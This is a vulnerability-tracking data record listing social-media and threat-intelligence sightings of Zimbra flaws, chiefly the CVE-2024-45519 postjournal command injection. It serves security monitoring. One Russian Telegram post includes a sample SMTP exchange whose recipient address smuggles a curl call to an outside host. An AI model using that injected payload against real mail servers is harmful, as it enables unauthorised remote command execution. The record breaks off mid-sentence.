{"vulnerability": "cve-2024-4551", "sightings": [{"uuid": "6955f848-6990-4afa-9f4f-9d076fcd251a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2024-10-03T21:10:01.000000Z"}, {"uuid": "f9490f66-eaa6-4ff8-b5cb-ebe58944224b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45510", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113517078055674772", "content": "", "creation_timestamp": "2024-11-20T20:05:52.434124Z"}, {"uuid": "d0e61a62-9070-4b6b-a68d-5d0a9acc4011", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45511", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113516679117523194", "content": "", "creation_timestamp": "2024-11-20T18:24:22.251998Z"}, {"uuid": "b3804bba-97d0-4b70-87aa-c83465587155", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45512", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113521813289996557", "content": "", "creation_timestamp": "2024-11-21T16:10:03.545009Z"}, {"uuid": "ca8d1422-2000-48d8-b323-e001ccf7b73f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45514", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113521813304781768", "content": "", "creation_timestamp": "2024-11-21T16:10:03.985622Z"}, {"uuid": "95b59e83-1cae-4ea7-b72c-aee5a0229b04", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45517", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113522000445292487", "content": "", "creation_timestamp": "2024-11-21T16:57:39.793370Z"}, {"uuid": "a63bcea3-3de1-4497-aa3c-af850b6f4593", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45513", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113522000411572182", "content": "", "creation_timestamp": "2024-11-21T16:57:39.727199Z"}, {"uuid": "78101531-46de-4397-a76a-551ef4b6164f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://bsky.app/profile/zttbytd.com/post/3leypimntq42j", "content": "", "creation_timestamp": "2025-01-05T13:19:39.524290Z"}, {"uuid": "2ecfe12b-51e5-4abd-90f8-18fb130ff00a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/ca550ce6-190e-460d-a052-c77cd8457862", "content": "", "creation_timestamp": "2026-02-02T12:26:27.312262Z"}, {"uuid": "6c706393-cf12-4dae-a911-8529952bca43", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45516", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lhuifazwf22h", "content": "", "creation_timestamp": "2025-02-11T01:17:32.688854Z"}, {"uuid": "455bc032-d928-4dcc-b901-e71458eb49d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45516", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lhuigf3u622h", "content": "", "creation_timestamp": "2025-02-11T01:18:08.648424Z"}, {"uuid": "ec8db3a4-3686-4d73-9414-39b71fde0130", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:10:59.000000Z"}, {"uuid": "5d32a4dd-8b14-4fde-b22c-d90d576dc101", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "MISP/f7787455-9994-4047-b6f7-77347597c104", "content": "", "creation_timestamp": "2025-08-26T18:36:20.000000Z"}, {"uuid": "2b623d22-0e2d-4995-b3ba-9a48ea57aabc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories", "content": "", "creation_timestamp": "2025-02-17T08:58:49.232676Z"}, {"uuid": "bcff61aa-bb2d-478e-a985-979eeaaea317", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://bsky.app/profile/kriptabiz.bsky.social/post/3lkv3l2oy7u2j", "content": "", "creation_timestamp": "2025-03-21T11:16:17.147727Z"}, {"uuid": "00639f28-f672-4275-aed7-0c3be9b64f3d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8602", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-45519 unauthenticated OS commoand Injection in Zimbra prior to 8.8.15***.\nURL\uff1ahttps://github.com/TOB1a3/CVE-2024-45519-PoC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-09-26T01:37:36.000000Z"}, {"uuid": "476c6fef-1b5f-4e47-9ff2-a95c47e8bd7f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/14494", "content": "\u200aZimbra - Remote Command Execution (CVE-2024-45519)\n\nhttps://blog.projectdiscovery.io/zimbra-remote-code-execution/", "creation_timestamp": "2024-09-28T10:56:35.000000Z"}, {"uuid": "4fb9c523-f809-4f5c-b885-94b5cf01134e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45516", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/16407", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-45516\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: An issue was discovered in Zimbra Collaboration (ZCS) 9.0.0 before Patch 43, 10.0.x before 10.0.12, 10.1.x before 10.1.4, and 8.8.15 before Patch 47. A Cross-Site Scripting (XSS) vulnerability in the Zimbra Classic UI allows attackers to execute arbitrary JavaScript within the victim's session, potentially leading to unauthorized access to sensitive information. This issue arises from insufficient sanitization of HTML content, including malformed  tags with embedded JavaScript. The vulnerability is triggered when the victim views a specially crafted email in the Classic UI, causing the malicious script to execute. No further user interaction is required beyond viewing the email.\n\ud83d\udccf Published: 2025-05-14T00:00:00.000Z\n\ud83d\udccf Modified: 2025-05-14T19:46:17.900Z\n\ud83d\udd17 References:\n1. https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories\n2. https://wiki.zimbra.com/wiki/Security_Center\n3. https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy\n4. https://wiki.zimbra.com/wiki/Zimbra_Releases/10.1.4#Security_Fixes", "creation_timestamp": "2025-05-14T20:32:37.000000Z"}, {"uuid": "58811040-4cf4-441c-91f0-c87fe0a3217b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8680", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aZimbra - Remote Command Execution (CVE-2024-45519)\nURL\uff1ahttps://github.com/Chocapikk/CVE-2024-45519\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-10-05T00:20:30.000000Z"}, {"uuid": "f43466bd-5cce-43a1-a602-1be9cdc29943", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://t.me/ptswarm/220", "content": "\u26a0\ufe0f We've confirmed critical CVE-2024-45519 in Zimbra!\n\nSMTP-based vulnerability in postjournal service allows unauthenticated attackers to inject commands under zimbra user.\n\n\u2705 Update your software ASAP to avoid exploitation!", "creation_timestamp": "2024-09-24T15:21:20.000000Z"}, {"uuid": "d1cdb031-308e-4a5c-8212-1cabb0f8380d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/beaverdreamer/167", "content": "#zimbra #rce\n\n\u0412\u044b\u0448\u043b\u0430 \u043d\u043e\u0432\u0430\u044f CVE-2024-45519 \u043d\u0430 Zimbra Collaboration Suite < 9.0.0, \u0430 \u0438\u043c\u0435\u043d\u043d\u043e \u043d\u0430 \u0441\u0435\u0440\u0432\u0438\u0441 postjournal. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u0439 \u043a\u043e\u0434 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438\n\u0412 \u0434\u043e\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a \u0434\u0440\u0443\u0433\u0438\u043c \u043f\u043e\u0441\u0442\u0430\u043c \u0445\u043e\u0447\u0443 \u043e\u0442\u043c\u0435\u0442\u0438\u0442\u044c, \u0447\u0442\u043e \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e Zimbra \u043d\u0435 \u0431\u0443\u0434\u0435\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u0430, \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u043d\u044b\u0439 \u043c\u043e\u0434\u0443\u043b\u044c postjournal.\n\n\u041f\u0440\u0438\u043c\u0435\u0440 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438:\nEHLO localhost\nMAIL FROM: \nRCPT TO: <\"aabbb$(curl${IFS}oast.me)\"@mail.domain.com>\nDATA\nTest message\n.\n\n\u0422\u0430\u043a \u0436\u0435 \u0434\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c \u043e\u0434\u0438\u043d \u0438\u0437 \u0434\u0432\u0443\u0445 \u043f\u0443\u043d\u043a\u0442\u043e\u0432:\n- \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u0432 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0439 \u043b\u0438\u0431\u043e \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u043d\u043e\u0439 \u0441\u0435\u0442\u0438 (\u0441\u043f\u0438\u0441\u043e\u043a mynetworks), \u043b\u0438\u0431\u043e \u0440\u0430\u0441\u0441\u0447\u0438\u0442\u044b\u0432\u0430\u0442\u044c \u0447\u0442\u043e \u043e\u043d\u0430 \u0431\u0443\u0434\u0435\u0442 \u043d\u0435\u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u043e \u0441\u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u0430\n- \u043f\u0440\u043e\u0439\u0442\u0438 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044e.\n\n\u041f\u0443\u0431\u043b\u0438\u0447\u043d\u044b\u0435 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u044b (\u0448\u0430\u0431\u043b\u043e\u043d nuclei \u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435) \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u044e\u0442 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0431\u0435\u0437 \u0430\u0443\u0442\u0445\u0430.\n\n\u0414\u0435\u0442\u0430\u043b\u0438 \u0432 \u043e\u0442\u043b\u0438\u0447\u043d\u043e\u043c \u0440\u0430\u0437\u0431\u043e\u0440\u0435 \u0432 \u0431\u043b\u043e\u0433\u0435 ProjectDiscovery.\n\n\u0421\u0441\u044b\u043b\u043a\u0438:\n- \u0420\u0430\u0437\u0431\u043e\u0440: https://blog.projectdiscovery.io/zimbra-remote-code-execution/\n- \u0428\u0430\u0431\u043b\u043e\u043d: https://github.com/projectdiscovery/nuclei-templates/pull/10860", "creation_timestamp": "2024-09-29T10:37:41.000000Z"}, {"uuid": "370bcf36-2012-4b54-8e4f-2fda7163512f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "Telegram/QxnLRuWdGgoTS9SuvQjCy4QGFdybsJKul7e0GN0IcFjceA", "content": "", "creation_timestamp": "2024-09-29T21:40:08.000000Z"}, {"uuid": "f571fbe0-d797-472a-b66f-ae5bb347e4e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/cyber_hsecurity/2598", "content": "Zimbra\n - Remote Command Execution (CVE-2024-45519)\n\ngithub.com/Chocapikk/CVE-2024-45519", "creation_timestamp": "2025-03-02T10:34:26.000000Z"}, {"uuid": "04311642-8f5b-45c0-be54-d4338b40a44a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/ton618cyber/4940", "content": "Researchers Sound Alarm on Active Attacks Exploiting Critical Zimbra Postjournal Flaw\n\nUrgent patching is needed for Zimbra Collaboration as attackers exploit CVE-2024-45519 to execute commands.\n\nthehackernews.com \u2022 Oct 2, 2024", "creation_timestamp": "2024-10-02T16:48:09.000000Z"}, {"uuid": "dd8a9ac2-c136-4325-8fbc-9d100a00494b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/ton618cyber/4921", "content": "#exploit\n1. CVE-2024-45519: \nZimbra SMTP RCE\nhttps://blog.projectdiscovery.io/zimbra-remote-code-execution\n]-> https://github.com/p33d/CVE-2024-45519\n\n2. CVE-2024-41110:\nDocker AuthZ plugins Security Checker\nhttps://github.com/vvpoglazov/cve-2024-41110-checker", "creation_timestamp": "2024-10-02T16:38:48.000000Z"}, {"uuid": "84dc77dc-a0d6-4019-b2ff-30d75af95cf6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/ptswarm/224", "content": "\ud83e\udd20 A notorious RCE in Zimbra, CVE-2024-45519 \u2013 here\u2019s our expert breakdown!\n\nHigh resolution", "creation_timestamp": "2024-09-30T14:31:29.000000Z"}, {"uuid": "2c366797-e715-49f7-a2a2-a0470643cf11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/kasperskyb2b/1441", "content": "\u23e9 \u0418\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f APT \u0438 \u043d\u043e\u0432\u043e\u0441\u0442\u0438 \u0418\u0411 \u0437\u0430 \u043d\u0435\u0434\u0435\u043b\u044e\n\n\ud83e\udd2f \u041e\u0431\u044b\u0447\u043d\u043e \u043c\u044b \u0438\u0433\u043d\u043e\u0440\u0438\u0440\u0443\u0435\u043c \u043d\u043e\u0432\u043e\u0441\u0442\u0438 APT \u0431\u0435\u0437 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0438\u043d\u0434\u0438\u043a\u0430\u0442\u043e\u0440\u043e\u0432, \u043d\u043e \u0442\u0443\u0442 \u0443\u0436 \u0431\u043e\u043b\u044c\u043d\u043e \u0443\u0432\u043b\u0435\u043a\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u0441\u044e\u0436\u0435\u0442. WSJ \u0441\u043e\u043e\u0431\u0449\u0430\u0435\u0442, \u0447\u0442\u043e \u043f\u0440\u0438 \u0440\u0430\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0438 \u0430\u0442\u0430\u043a APT Salt Typhoon \u0432\u044b\u044f\u0441\u043d\u0438\u043b\u043e\u0441\u044c, \u0447\u0442\u043e \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0435 \u0443\u0441\u043f\u0435\u0448\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0430\u044e\u0442 \u043d\u0443\u0436\u043d\u044b\u0439 \u0442\u0440\u0430\u0444\u0438\u043a \u0430\u043c\u0435\u0440\u0438\u043a\u0430\u043d\u0446\u0435\u0432, \u043f\u043e\u043b\u044c\u0437\u0443\u044f\u0441\u044c \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u043c\u0438, \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u043c\u0438 \u0432 \u0441\u0435\u0442\u044f\u0445 AT&T, Verizon \u0438 \u043f\u0440\u043e\u0447\u0438\u0445 \u0442\u0435\u043b\u0435\u043a\u043e\u043c\u043e\u0432 \u0434\u043b\u044f \u0437\u0430\u043a\u043e\u043d\u043d\u043e\u0439 \u043f\u0440\u043e\u0441\u043b\u0443\u0448\u043a\u0438 \u0430\u043c\u0435\u0440\u0438\u043a\u0430\u043d\u0441\u043a\u0438\u043c\u0438 \u0441\u043f\u0435\u0446\u0441\u043b\u0443\u0436\u0431\u0430\u043c\u0438 (\u0430\u043d\u0430\u043b\u043e\u0433 \u0421\u041e\u0420\u041c). \u042d\u0442\u043e \u2014 \u0445\u043e\u0440\u043e\u0448\u0435\u0435 \u043d\u0430\u043f\u043e\u043c\u0438\u043d\u0430\u043d\u0438\u0435 \u043e \u0442\u043e\u043c, \u0447\u0442\u043e \u043d\u0435\u043b\u044c\u0437\u044f \u0441\u043e\u0437\u0434\u0430\u0442\u044c \u0431\u044d\u043a\u0434\u043e\u0440 \u0434\u043b\u044f \u043a\u043e\u0433\u043e-\u0442\u043e \u043e\u0434\u043d\u043e\u0433\u043e, \u0440\u0430\u043d\u043e \u0438\u043b\u0438 \u043f\u043e\u0437\u0434\u043d\u043e \u043e\u043d \u0431\u0443\u0434\u0435\u0442 \u0434\u043b\u044f \u0432\u0441\u0435\u0445.\n\n\ud83d\udc7d SIEM \u043d\u0430 \u0441\u043b\u0443\u0436\u0431\u0435 \u0437\u043b\u043e\u0434\u0435\u0435\u0432: \u0432 \u043d\u043e\u0432\u043e\u0439 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 \u0434\u043b\u044f \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044f \u0438 \u0441\u0431\u043e\u0440\u0430 \u0442\u0435\u043b\u0435\u043c\u0435\u0442\u0440\u0438\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043a\u043b\u0438\u0435\u043d\u0442 open source SIEM Wazuh. \u041a\u043e\u043d\u0435\u0447\u043d\u043e\u0439 \u0446\u0435\u043b\u044c\u044e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043c\u0430\u0439\u043d\u0438\u043d\u0433.\n\n\ud83d\ude2e Cloudflare \u043e\u0442\u0447\u0438\u0442\u0430\u043b\u0441\u044c \u043e \u0431\u043e\u0440\u044c\u0431\u0435 \u0441 \u043a\u0440\u0443\u043f\u043d\u0435\u0439\u0448\u0435\u0439 DDoS-\u0430\u0442\u0430\u043a\u043e\u0439 \u0430\u0436 \u043d\u0430 3,8 \u0422\u0431/\u0441.\n\n\ud83d\udc7e \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435 \u043c\u0430\u0441\u0441\u0438\u0432\u043d\u043e\u0439 \u0441\u0435\u0442\u0438 \u0437\u0430\u0440\u0430\u0436\u0451\u043d\u043d\u044b\u0445 \u0440\u043e\u0443\u0442\u0435\u0440\u043e\u0432, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0432\u044b\u0441\u0442\u0443\u043f\u0430\u044e\u0442 \u0434\u043e\u043c\u0430\u0448\u043d\u0438\u043c\u0438 \u043f\u0440\u043e\u043a\u0441\u0438 \u0438 \u043f\u0440\u043e\u043c\u0435\u0436\u0443\u0442\u043e\u0447\u043d\u044b\u043c\u0438 \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u043c\u0438 \u0434\u043b\u044f \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a. \u0411\u043e\u043b\u044c\u0448\u0435 \u0432\u0441\u0435\u0433\u043e \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432 \u043d\u0430\u0439\u0434\u0435\u043d\u043e \u0432 \u0421\u0428\u0410, \u0413\u043e\u043d\u043a\u043e\u043d\u0433\u0435 \u0438 \u0428\u0432\u0435\u0446\u0438\u0438, \u0441\u0430\u043c\u044b\u0435 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0435 \u0434\u0435\u0432\u0430\u0439\u0441\u044b \u0432 \u0431\u043e\u0442\u043d\u0435\u0442\u0435 \u2014 Asus \u0438 Qnap. \u041d\u0430 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u0445 \u043d\u0430\u0439\u0434\u0435\u043d\u044b \u043e\u0431\u0440\u0430\u0437\u0446\u044b \u0412\u041f\u041e GobRAT \u0438 Bulbature. \n\n\u0410 \u0412\u041f\u041e perfctl \u0443\u0436\u0435 \u0442\u0440\u0438 \u0433\u043e\u0434\u0430 \u043c\u0430\u0441\u0441\u043e\u0432\u043e \u0437\u0430\u0440\u0430\u0436\u0430\u0435\u0442 Linux-\u0441\u0435\u0440\u0432\u0435\u0440\u044b, \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044f 20 \u0442\u044b\u0441\u044f\u0447 \u043e\u0448\u0438\u0431\u043e\u043a \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438.  \u041f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u0435 \u0412\u041f\u041e \u043c\u0430\u0441\u043a\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0440\u0443\u0442\u043a\u0438\u0442\u043e\u043c \u0438 \u0446\u0435\u043b\u044b\u043c \u043d\u0430\u0431\u043e\u0440\u043e\u043c \u0434\u0440\u0443\u0433\u0438\u0445 \u0442\u0440\u044e\u043a\u043e\u0432 \u0434\u043b\u044f \u043c\u0430\u043a\u0441\u0438\u043c\u0438\u0437\u0430\u0446\u0438\u0438 \u0441\u043a\u0440\u044b\u0442\u043d\u043e\u0441\u0442\u0438. \u0412 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0444\u0438\u043d\u0430\u043b\u044c\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u043e\u0431\u044b\u0447\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043c\u0430\u0439\u043d\u0435\u0440.\n\n\u0412 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438, \u0440\u0430\u043d\u0435\u0435 \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0440\u0443\u0435\u043c\u043e\u0439 APT Mustang Panda, \u043d\u0430\u0448\u0451\u043b\u0441\u044f \u043a\u043b\u0430\u0441\u0442\u0435\u0440, \u0432\u0438\u0434\u0438\u043c\u043e \u043f\u0440\u0438\u043d\u0430\u0434\u043b\u0435\u0436\u0430\u0449\u0438\u0439 \u043d\u043e\u0432\u043e\u0439 \u043f\u043e\u0434\u0433\u0440\u0443\u043f\u043f\u0435, \u043d\u0430\u0437\u0432\u0430\u043d\u043d\u043e\u0439 CeranaKeeper. \u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u044b\u0435 \u043e\u0431\u043b\u0430\u0447\u043d\u044b\u0435 \u0441\u0435\u0440\u0432\u0438\u0441\u044b \u0434\u043b\u044f \u04212 \u0438 \u044d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u0438. \n\n\ud83d\udc6e\u200d\u2640\ufe0f\u041a\u0440\u0430\u0442\u043a\u0438\u0439 \u0440\u0430\u0437\u0431\u043e\u0440 \u043d\u043e\u0432\u044b\u0445 \u043c\u043e\u0434\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0439 \u0438 \u0430\u0442\u0430\u043a Akira ransomware: TTP, IoC, \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 \u043f\u043e \u0445\u0430\u043d\u0442\u0438\u043d\u0433\u0443.\n\n\u2328\ufe0f\u041e\u0431\u0437\u043e\u0440 \u0434\u0435\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0438 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 CyberVolk, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043d\u0430\u0447\u0438\u043d\u0430\u043b\u0430 \u0441 \u0445\u0430\u043a\u0442\u0438\u0432\u0438\u0437\u043c\u0430, \u0430 \u0432 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0435 \u0432\u0440\u0435\u043c\u044f \u0430\u043a\u0442\u0438\u0432\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043b\u0430 \u0444\u0438\u043d\u0430\u043d\u0441\u043e\u0432\u043e \u043c\u043e\u0442\u0438\u0432\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0430\u0442\u0430\u043a\u0438 ransomware.\n\n\ud83d\ude93 \u041e\u043a\u043e\u043b\u043e 5% \u0432\u0441\u0435\u0445 \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442-\u043c\u0430\u0433\u0430\u0437\u0438\u043d\u043e\u0432, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0449\u0438\u0445 \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b Magento/Adobe Commerce, 